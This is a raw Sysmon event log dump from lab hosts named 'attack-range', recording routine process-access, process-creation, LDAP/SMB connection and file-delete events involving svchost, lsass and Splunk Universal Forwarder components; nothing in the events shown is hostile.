Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1B5F-6216-8205-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.239{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B5F-6216-8205-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:47.240{4F8D34B0-1B5F-6216-8205-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000300427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.728{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58963-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.728{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58963-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.705{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local58962-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.705{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local58962-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:44.948{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58961-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000300422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:44.948{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58961-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000224201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB4698F3F6E1EC1059209CDCFF2F0C3,SHA256=575F8247479E0A322C8931497F8786F6ACA70438C2841E420E4B59FAA1303DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:48.586{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7921885909F636810D05D72B383B6971,SHA256=146C8C637825D62BBEB1416C572064D758A3096CFDB0932F0B07DBE77E8D43A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B60-6216-8305-000000003902}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:48.879{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 